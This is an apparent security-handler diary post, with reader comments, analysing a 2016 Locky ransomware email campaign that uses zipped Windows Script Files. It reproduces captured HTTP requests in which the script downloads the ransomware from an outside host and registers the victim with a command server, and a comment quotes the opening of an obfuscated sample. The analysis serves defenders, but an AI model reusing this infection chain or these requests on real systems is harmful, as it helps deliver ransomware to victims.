Today's Locky Variant Arrives as a Windows Script File

Today's Locky Variant Arrives as a Windows Script File
Pretty much all the Locky variants I have looked at the last couple days arrived as zipped JavaScript files. Today, I got something slightly different. While the e-mail looked the same overall, the file was a zipped Windows Script File (.wsf). Overall, this isn't all that different. "Windows Script" is essentially JavaScript. The only difference is the tag at the beginning of the file. Today's subject for the e-mail was "Transaction details". Once the user runs the script by double-clicking the file, it will download the actual crypto ransomware. GET /2tn0o HTTP/1.1 Accept: / Accept-Language: en-us Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: onlybest76.xyz Connection: Keep-Alive Just like earlier versions, it then "registers" the infected system with a website that is only identified by its IP address, so you will not see a DNS lookup for it: POST /data/info.php HTTP/1.1 Accept: / Accept-Language: en-us Referer: http://95.85.19.195/data/ x-requested-with: XMLHttpRequest Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Cache-Control: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 95.85.19.195 Content-Length: 942 Connection: Keep-Alive [post data omitted] Anti-Malware proves its usual value by doing probably slightly better than a blind chicken in protecting you from this malware. You can download a file with packet capture, mail server logs, and the malware sample here (password: "blind chicken" ). Between 9am and 1:30pm UTC, I received 1425 e-mails that match this pattern. --- Johannes B. Ullrich, Ph.D. STI\|Twitter\|LinkedIn I will be teaching next: Application Security: Securing Web Apps, APIs, and Microservices - SANSFIRE 2022	Johannes 4506 Posts ISC Handler Aug 30th 2016
Thread locked Subscribe	Aug 30th 2016 5 years ago
Also using HTA files today & on other odd occasions recently https://myonlinesecurity.co.uk/sent-with-genius-scan-for-ios-pretending-to-come-from-your-own-email-address-leads-to-locky-ransomware/	DVK01 21 Posts
Quote	Aug 31st 2016 5 years ago
Greetings: I'm pretty sure I just got some malware in the form of a ZIP file containing a .wsf file (XML text). It's a bit long to paste. First few lines: <?xml?> <package> <job id='oevPEW'><script language='JScript'></script><script language='JScript'><![CDATA[ String.prototype.toshibasatelliteLAMODAtiiiyamooo = function() { If this is of any interest, let me know the best way to get it to you. I'm on an Air Force base, so I may not be able to use methods that work for everyone else. Thanks. -- Karl Vogel vogelke+isc@pobox.com	kvogel 1 Posts
Quote	Sep 6th 2016 5 years ago
you can upload file via our contact form isc.sans.edu/…	Johannes 4506 Posts ISC Handler
Quote	Sep 6th 2016 5 years ago